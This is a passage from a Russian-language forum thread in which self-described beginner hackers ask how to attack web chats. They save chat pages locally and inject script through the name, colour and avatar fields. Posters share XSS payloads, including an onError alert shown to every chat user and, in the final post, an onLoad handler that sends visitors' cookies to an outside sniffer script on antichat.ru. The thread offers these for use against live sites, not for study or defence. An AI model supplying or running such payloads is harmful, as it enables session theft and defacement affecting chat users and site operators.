Я всё хочу научиться ломать чаты при помощи сохранения их на диск. Я кой-как разбираюсь в html и java, но всё равно чё то не догнать мне некоторых деталей.
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Хакер @ июля 20 2004,22:50)</td></tr><tr><td id="QUOTE">Народ кто хорошо разбирается в компах и хакинге помогите точнее научите работать с чатом с диска пишите на асю или на почту можите даже оставлять сообщения в форуме кто не знает тот не отвечает ХОРОШО? Зарание спасибо мыло моё [email protected][/QUOTE]<span id='postcolor'> я могу научить
Кто-нить объясните. Я сохранил страницу на харде и вроде внёс все нужные изменения в html. Ввёл символы "=& и т.п. в поле имя и цвет, на чат зашёл без проблем. Но. Куда нужно вставлять например вот этот скрипт <font onclick="javascript:alert()">Text</font>? Его надо вставлять в html страницы или прямо в поле ввода сообщения? Или ещё куда-нить?
народ вот взлом через лицо типа печатаешь сообшение а у всех вылазит ошибка "чат поимели". вот мне там типан сказал...засунь это " onError="alert(/ Чат поимели /)" z=" а у меня один хрен не канает что можно ещё туда зпихнуть ???? (имею ввиду в поля для рожи )
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Кто-нить объясните. Я сохранил страницу на харде и вроде внёс все нужные изменения в html. Ввёл символы "=& и т.п. в поле имя и цвет, на чат зашёл без проблем. Но. Куда нужно вставлять например вот этот скрипт <font onclick="javascript:alert()">Text</font>? Его надо вставлять в html страницы или прямо в поле ввода сообщения? Или ещё куда-нить? [/QUOTE]<span id='postcolor'> У меня тож такаяже проблема,ну вы там больно не смейтесь мы веть тока начинающие хакеры. Подскажите плиз
TO: zFailure слушай с мессагой канает а вот со снифером не как ведь там поле для лица и всё а твой пример стоит после 1.gif" и в поле соответчтвенно что то впишеш но толь ко до 1.gif" а куда писать onLoad="x=new Image();x.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;" z="